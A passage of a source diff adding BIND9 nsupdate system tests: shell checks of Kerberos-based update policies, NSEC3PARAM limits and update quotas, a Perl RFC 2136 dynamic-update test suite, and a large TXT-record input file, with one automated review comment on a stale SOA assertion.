${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDNSKEY 257 3 13 d0NQ5PKmDz6P0B1WPMH9/UKRux/toSFwV2nTJYPA1Cx8pB0sJGTXbVhG U+6gye7VCHDhGIn9CjVfb2RJPW7GnQ== +send +END +retry_quiet 5 has_positive_response multisigner.test CDNSKEY 10.53.0.3 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that excessive NSEC3PARAM iterations are rejected by nsupdate ($n)" +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone example +update add example 0 in NSEC3PARAM 1 0 151 - +END +grep "NSEC3PARAM has excessive iterations (> 150)" nsupdate.out-$n >/dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that update is rejected if query is not allowed ($n)" +{ + $NSUPDATE -d <<END + local 10.53.0.2 + server 10.53.0.1 ${PORT} + update add reject.other.nil 3600 IN TXT Whatever + send +END +} > nsupdate.out.test$n 2>&1 +grep 'failed: REFUSED' nsupdate.out.test$n > /dev/null 
|| ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +# This check is unstable on Windows. +if [ ! "$CYGWIN" ]; then + n=$((n + 1)) + ret=0 + echo_i "check that update is rejected if quota is exceeded ($n)" + for loop in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + { + $NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > /dev/null 2>&1 <<END + update add txt-$loop.other.nil 3600 IN TXT Whatever + send +END + } & + done + wait_for_log 10 "too many DNS UPDATEs queued" ns1/named.run || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } +fi + +if ! $FEATURETEST --gssapi ; then + echo_i "SKIPPED: GSSAPI tests" +else + n=$((n + 1)) + ret=0 + echo_i "check krb5-self match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add machine.example.com 3600 IN A 10.53.0.7 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.7 machine.example.com A > dig.out.ns7.test$n + grep "status: NOERROR" dig.out.ns7.test$n > /dev/null || ret=1 + grep "machine.example.com..*A.*10.53.0.7" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-self no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.7 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.7 foo.example.com A > dig.out.ns7.test$n + grep "status: NXDOMAIN" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-subdomain match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + 
gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add _xxx._tcp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.7 _xxx._tcp.example.com SRV > dig.out.ns7.test$n + grep "status: NOERROR" dig.out.ns7.test$n > /dev/null || ret=1 + grep "_xxx._tcp.example.com.*SRV.*0 0 0 machine.example.com" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-subdomain no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add _xxx._udp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.7 _xxx._udp.example.com SRV > dig.out.ns7.test$n + grep "status: NXDOMAIN" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n+1)) + ret=0 + echo_i "check krb5-selfsub match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns8/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.8 ${PORT} + zone example.com + update add xxx.machine.example.com 3600 IN A 10.53.0.8 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.8 xxx.machine.example.com A > dig.out.ns8.test$n + grep "status: NOERROR" dig.out.ns8.test$n > /dev/null || ret=1 + grep "xxx.machine.example.com..*A.*10.53.0.8" dig.out.ns8.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-selfsub no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns8/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.8 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.8 + send +EOF 
+ grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.8 foo.example.com A > dig.out.ns8.test$n + grep "status: NXDOMAIN" dig.out.ns8.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + + echo_i "check ms-self match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add machine.example.com 3600 IN A 10.53.0.9 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.9 machine.example.com A > dig.out.ns9.test$n + grep "status: NOERROR" dig.out.ns9.test$n > /dev/null || ret=1 + grep "machine.example.com..*A.*10.53.0.9" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-self no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.9 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.9 foo.example.com A > dig.out.ns9.test$n + grep "status: NXDOMAIN" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-subdomain match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add _xxx._tcp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.9 _xxx._tcp.example.com SRV > dig.out.ns9.test$n + grep "status: NOERROR" dig.out.ns9.test$n > /dev/null || ret=1 + grep "_xxx._tcp.example.com.*SRV.*0 0 0 machine.example.com" dig.out.ns9.test$n > 
/dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-subdomain no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add _xxx._udp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.9 _xxx._udp.example.com SRV > dig.out.ns9.test$n + grep "status: NXDOMAIN" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n+1)) + ret=0 + echo_i "check ms-selfsub match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns10/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.10 ${PORT} + zone example.com + update add xxx.machine.example.com 3600 IN A 10.53.0.10 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.10 xxx.machine.example.com A > dig.out.ns10.test$n + grep "status: NOERROR" dig.out.ns10.test$n > /dev/null || ret=1 + grep "xxx.machine.example.com..*A.*10.53.0.10" dig.out.ns10.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-selfsub no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns10/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.10 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.10 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.10 foo.example.com A > dig.out.ns10.test$n + grep "status: NXDOMAIN" dig.out.ns10.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
diff --git a/bin/tests/system/nsupdate/update_test.pl b/bin/tests/system/nsupdate/update_test.pl
new file mode 100644
index 0000000..835f1f8
--- /dev/null
+++ b/bin/tests/system/nsupdate/update_test.pl
@@ -0,0 +1,429 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Dynamic update test suite. +# +# Usage: +# +# perl update_test.pl [-s server] [-p port] zone +# +# The server defaults to 127.0.0.1. +# The port defaults to 53. +# +# The "Special NS rules" tests will only work correctly if the +# zone has no NS records to begin with, or alternatively has a +# single NS record pointing at the name "ns1" (relative to +# the zone name). +# +# Installation notes: +# +# This program uses the Net::DNS::Resolver module. +# You can install it by saying +# +# perl -MCPAN -e "install Net::DNS" +# + +use Getopt::Std; +use Net::DNS; +use Net::DNS::Update; +use Net::DNS::Resolver; + +$opt_s = "127.0.0.1"; +$opt_p = 53; + +getopt('s:p:'); + +$res = new Net::DNS::Resolver; +$res->nameservers($opt_s); +$res->port($opt_p); +$res->defnames(0); # Do not append default domain. + +@ARGV == 1 or die + "usage: perl update_test.pl [-s server] [-p port] zone\n"; + +$zone = shift @ARGV; + +my $failures = 0; + +sub assert { + my ($cond, $explanation) = @_; + if (!$cond) { + print "Test Failed: $explanation ***\n"; + $failures++; + } +} + +sub test { + my ($expected, @records) = @_; + + my $update = new Net::DNS::Update("$zone"); + + foreach $rec (@records) { + $update->push(@$rec); + } + + $reply = $res->send($update); + + # Did it work? 
+ if (defined $reply) { + my $rcode = $reply->header->rcode; + assert($rcode eq $expected, "expected $expected, got $rcode"); + } else { + print "Update failed: ", $res->errorstring, "\n"; + $failures++; + } +} + +sub section { + my ($msg) = @_; + print "$msg\n"; +} + +section("Delete any leftovers from previous tests"); +test("NOERROR", ["update", rr_del("a.$zone")]); +test("NOERROR", ["update", rr_del("b.$zone")]); +test("NOERROR", ["update", rr_del("c.$zone")]); +test("NOERROR", ["update", rr_del("d.$zone")]); +test("NOERROR", ["update", rr_del("e.$zone")]); +test("NOERROR", ["update", rr_del("f.$zone")]); +test("NOERROR", ["update", rr_del("ns.s.$zone")]); +test("NOERROR", ["update", rr_del("s.$zone")]); +test("NOERROR", ["update", rr_del("t.$zone")]); +test("NOERROR", ["update", rr_del("*.$zone")]); +test("NOERROR", ["update", rr_del("u.$zone")]); +test("NOERROR", ["update", rr_del("a.u.$zone")]); +test("NOERROR", ["update", rr_del("b.u.$zone")]); + +section("Simple prerequisites in the absence of data"); +# Name is in Use +test("NXDOMAIN", ["pre", yxdomain("a.$zone")]); +# RRset exists (value independent) +test("NXRRSET", ["pre", yxrrset("a.$zone A")]); +# Name is not in use +test("NOERROR", ["pre", nxdomain("a.$zone")]); +# RRset does not exist +test("NOERROR", ["pre", nxrrset("a.$zone A")]); +# RRset exists (value dependent) +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.49")]); + + +section ("Simple creation of data"); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); + +section ("Simple prerequisites in the presence of data"); +# Name is in use +test("NOERROR", ["pre", yxdomain("a.$zone")]); +# RRset exists (value independent) +test("NOERROR", ["pre", yxrrset("a.$zone A")]); +# Name is not in use +test("YXDOMAIN", ["pre", nxdomain("a.$zone")]); +# RRset does not exist +test("YXRRSET", ["pre", nxrrset("a.$zone A")]); +# RRset exists (value dependent) +test("NOERROR", ["pre", yxrrset("a.$zone A 73.80.65.49")]); + +# +# Merging of 
RRsets +# +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); + +section("Detailed tests of \"RRset exists (value dependent)\" prerequisites"); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.49"), + yxrrset("a.$zone A 73.80.65.50")]); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.50"), + yxrrset("a.$zone A 73.80.65.49")]); +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.49")]); +test("NXRRSET", ["pre", yxrrset("a.$zone A 73.80.65.50")]); +test("NXRRSET", ["pre", + yxrrset("a.$zone A 73.80.65.49"), + yxrrset("a.$zone A 73.80.65.50"), + yxrrset("a.$zone A 73.80.65.51")]); + + +section("Torture test of \"RRset exists (value dependent)\" prerequisites."); + +test("NOERROR", ["update", + rr_add("e.$zone 300 A 73.80.65.49"), + rr_add("e.$zone 300 TXT 'one'"), + rr_add("e.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 A 73.80.65.52"), + rr_add("f.$zone 300 A 73.80.65.52"), + rr_add("e.$zone 300 A 73.80.65.51")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 TXT 'three'"), + rr_add("e.$zone 300 TXT 'two'")]); +test("NOERROR", ["update", + rr_add("e.$zone 300 MX 10 mail.$zone")]); + +test("NOERROR", ["pre", + yxrrset("e.$zone A 73.80.65.52"), + yxrrset("e.$zone TXT 'two'"), + yxrrset("e.$zone A 73.80.65.51"), + yxrrset("e.$zone TXT 'three'"), + yxrrset("e.$zone A 73.80.65.50"), + yxrrset("f.$zone A 73.80.65.52"), + yxrrset("e.$zone A 73.80.65.49"), + yxrrset("e.$zone TXT 'one'")]); + + +section("Subtraction of RRsets"); +test("NOERROR", ["update", rr_del("a.$zone A 73.80.65.49")]); +test("NOERROR", ["pre", + yxrrset("a.$zone A 73.80.65.50")]); + +test("NOERROR", ["update", rr_del("a.$zone A 73.80.65.50")]); +test("NOERROR", ["pre", nxrrset("a.$zone A")]); +test("NOERROR", ["pre", nxdomain("a.$zone")]); + +section("Other forms of deletion"); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", 
rr_add("a.$zone 300 MX 10 mail.$zone")]); +test("NOERROR", ["update", rr_del("a.$zone A")]); +test("NOERROR", ["pre", nxrrset("a.$zone A")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("a.$zone 300 A 73.80.65.50")]); +test("NOERROR", ["update", rr_del("a.$zone")]); +test("NOERROR", ["pre", nxdomain("a.$zone")]); + +section("Case insensitivity"); +test("NOERROR", ["update", rr_add("a.$zone 300 PTR foo.net.")]); +test("NOERROR", ["pre", yxrrset("A.$zone PTR fOo.NeT.")]); + +section("Special CNAME rules"); +test("NOERROR", ["update", rr_add("b.$zone 300 CNAME foo.net.")]); +test("NOERROR", ["update", rr_add("b.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("b.$zone CNAME foo.net.")]); +test("NOERROR", ["pre", nxrrset("b.$zone A")]); + +test("NOERROR", ["update", rr_add("c.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("c.$zone 300 CNAME foo.net.")]); +test("NOERROR", ["pre", yxrrset("c.$zone A")]); +test("NOERROR", ["pre", nxrrset("c.$zone CNAME")]); + +# XXX should test with SIG, KEY, NXT, too. + +# +# Currently commented out because Net::DNS does not properly +# support WKS records. +# +#section("Special WKS rules"); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 TCP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 UDP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.50 TCP telnet ftp")]); +#test("NOERROR", ["update", rr_add("c.$zone 300 WKS 73.80.65.49 TCP smtp")]); +#test("NOERROR", ["pre", +# yxrrset("c.$zone WKS 73.80.65.49 TCP smtp"), +# yxrrset("c.$zone WKS 73.80.65.49 UDP telnet ftp"), +# yxrrset("c.$zone WKS 73.80.65.50 TCP telnet ftp")]); + + +section("Special NS rules"); + +# Deleting the last NS record using "Delete an RR from an RRset" +# should fail at the zone apex and work elsewhere. 
The pseudocode +# in RFC2136 says it should fail everywhere, but this is in conflict +# with the actual text. + +# Apex +test("NOERROR", ["update", + rr_add("$zone 300 NS ns1.$zone"), + rr_add("$zone 300 NS ns2.$zone")]); +test("NOERROR", ["update", rr_del("$zone NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("$zone NS ns2.$zone")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +# Non-apex +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("n.$zone NS ns1.$zone")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +# Other ways of deleting NS records should also fail at the apex +# and work elsewhere. + +# Non-apex +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["update", rr_del("n.$zone NS")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +test("NOERROR", ["update", rr_add("n.$zone 300 NS ns1.$zone")]); +test("NOERROR", ["pre", yxrrset("n.$zone NS")]); +test("NOERROR", ["update", rr_del("n.$zone")]); +test("NOERROR", ["pre", nxrrset("n.$zone NS")]); + +# Apex +test("NOERROR", ["update", rr_del("$zone NS")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +test("NOERROR", ["update", rr_del("$zone")]); +test("NOERROR", ["pre", + yxrrset("$zone NS ns2.$zone")]); + +# They should not touch the SOA, either. 
+ +test("NOERROR", ["update", rr_del("$zone SOA")]); +test("NOERROR", ["pre", yxrrset("$zone SOA")]); + + +section("Idempotency"); + +test("NOERROR", ["update", rr_add("d.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("d.$zone A 73.80.65.49")]); +test("NOERROR", ["update", + rr_add("d.$zone 300 A 73.80.65.49"), + rr_del("d.$zone A")]); +test("NOERROR", ["pre", nxrrset("d.$zone A")]); + +test("NOERROR", ["update", rr_del("d.$zone A 73.80.65.49")]); +test("NOERROR", ["pre", nxrrset("d.$zone A")]); +test("NOERROR", ["update", + rr_del("d.$zone A"), + rr_add("d.$zone 300 A 73.80.65.49")]); + +test("NOERROR", ["pre", yxrrset("d.$zone A")]); + +section("Out-of-zone prerequisites and updates"); +test("NOTZONE", ["pre", yxrrset("a.somewhere.else. A 73.80.65.49")]); +test("NOTZONE", ["update", rr_add("a.somewhere.else. 300 A 73.80.65.49")]); + + +section("Glue"); +test("NOERROR", ["update", rr_add("s.$zone 300 NS ns.s.$zone")]); +test("NOERROR", ["update", rr_add("ns.s.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["pre", yxrrset("ns.s.$zone A 73.80.65.49")]); + +section("Wildcards"); +test("NOERROR", ["update", rr_add("*.$zone 300 MX 10 mail.$zone")]); +test("NOERROR", ["pre", yxrrset("*.$zone MX 10 mail.$zone")]); +test("NXRRSET", ["pre", yxrrset("w.$zone MX 10 mail.$zone")]); +test("NOERROR", ["pre", nxrrset("w.$zone MX")]); +test("NOERROR", ["pre", nxdomain("w.$zone")]); + + +section("SOA serial handling"); + +my $soatimers = "20 20 1814400 3600"; + +# Get the current SOA serial number. +my $query = $res->query($zone, "SOA"); +my ($old_soa) = $query->answer; + +my $old_serial = $old_soa->serial; + +# Increment it by 10. +my $new_serial = $old_serial + 10; +if ($new_serial > 0xFFFFFFFF) { + $new_serial -= 0x80000000; + $new_serial -= 0x80000000; +} + +# Replace the SOA with a new one. +test("NOERROR", ["update", rr_add("$zone 300 SOA mname1. . $new_serial $soatimers")]); + +# Check that the SOA really got replaced. 
+($db_soa) = $res->query($zone, "SOA")->answer; +assert($db_soa->mname eq "mname1"); + +# Check that attempts to decrement the serial number are ignored. +$new_serial = $old_serial - 10; +if ($new_serial < 0) { + $new_serial += 0x80000000; + $new_serial += 0x80000000; +} +test("NOERROR", ["update", rr_add("$zone 300 SOA mname2. . $new_serial $soatimers")]); +assert($db_soa->mname eq "mname1"); + +# Check that attempts to leave the serial number unchanged are ignored. +($old_soa) = $res->query($zone, "SOA")->answer; +$old_serial = $old_soa->serial; +test("NOERROR", ["update", rr_add("$zone 300 SOA mname3. . $old_serial " . + $soatimers)]); +($db_soa) = $res->query($zone, "SOA")->answer; +assert($db_soa->mname eq "mname1"); + +# +# Currently commented out because Net::DNS does not properly +# support multiple strings in TXT records. +# +#section("Big data"); +#test("NOERROR", ["update", rr_add("a.$zone 300 TXT aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc")]); +#test("NOERROR", ["update", rr_del("a.$zone TXT aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb 
cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc")]); +test("NOERROR", ["update", rr_add("a.$zone 300 TXT " . ("foo " x 3))]); + +section("Updating TTLs only"); + +test("NOERROR", ["update", rr_add("t.$zone 300 A 73.80.65.49")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 300, "incorrect TTL value $ttl != 300"); +test("NOERROR", ["update", + rr_del("t.$zone A 73.80.65.49"), + rr_add("t.$zone 301 A 73.80.65.49")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 301, "incorrect TTL value $ttl != 301"); + +# Add an RR that is identical to an existing one except for the TTL. +# RFC2136 is not clear about what this should do; it says "duplicate RRs +# will be silently ignored" but is an RR differing only in TTL +# to be considered a duplicate or not? The test assumes that it +# should not be considered a duplicate. +test("NOERROR", ["update", rr_add("t.$zone 302 A 73.80.65.50")]); +($a) = $res->query("t.$zone", "A")->answer; +$ttl = $a->ttl; +assert($ttl == 302, "incorrect TTL value $ttl != 302"); + +section("TTL normalization"); + +# The desired behaviour is that the old RRs get their TTL +# changed to match the new one. RFC2136 does not explicitly +# specify this, but I think it makes more sense than the +# alternatives. 
+ +test("NOERROR", ["update", rr_add("t.$zone 303 A 73.80.65.51")]); +(@answers) = $res->query("t.$zone", "A")->answer; +$nanswers = scalar @answers; +assert($nanswers == 3, "wrong number of answers $nanswers != 3"); +foreach $a (@answers) { + $ttl = $a->ttl; + assert($ttl == 303, "incorrect TTL value $ttl != 303"); +} + +section("Obscuring existing data by zone cut"); +test("NOERROR", ["update", rr_add("a.u.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("b.u.$zone 300 A 73.80.65.49")]); +test("NOERROR", ["update", rr_add("u.$zone 300 TXT txt-not-in-nxt")]); +test("NOERROR", ["update", rr_add("u.$zone 300 NS ns.u.$zone")]); + +test("NOERROR", ["update", rr_del("u.$zone NS ns.u.$zone")]); + +if ($Net::DNS::VERSION < 1.01) { + print "skipped Excessive NSEC3PARAM iterations; Net::DNS too old.\n"; +} else { + section("Excessive NSEC3PARAM iterations"); + test("REFUSED", ["update", rr_add("$zone 300 NSEC3PARAM 1 0 151 -")]); + test("NOERROR", ["update", rr_add("$zone 300 NSEC3PARAM 1 0 150 -")]); +} + +if ($failures) { + print "$failures tests failed.\n"; +} else { + print "All tests successful.\n"; +} +exit $failures; diff --git a/bin/tests/system/nsupdate/verylarge.in b/bin/tests/system/nsupdate/verylarge.in new file mode 100644 index 0000000..2e66221 --- /dev/null +++ b/bin/tests/system/nsupdate/verylarge.in 
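Review bot: The serial-decrement check in the "SOA serial handling" section asserts on a stale object. After the `mname2` update, `assert($db_soa->mname eq "mname1")` reuses the `$db_soa` fetched before that update, so it passes even if the server accepted the rollback. Re-query first with `($db_soa) = $res->query($zone, "SOA")->answer;`, as the unchanged-serial check just below already does. The three SOA asserts also pass no explanation, so a failure prints only `Test Failed:  ***`; a second argument such as `"SOA mname changed after serial decrement"` would make the failure identifiable. Separately, `exit $failures;` is taken modulo 256 by the shell, so `exit($failures ? 1 : 0);` avoids a false pass at exactly 256 failures.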
@@ -0,0 +1,3 @@ +server 10.53.0.1 @PORT@ +update add txt.update.nil. 600 TXT 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 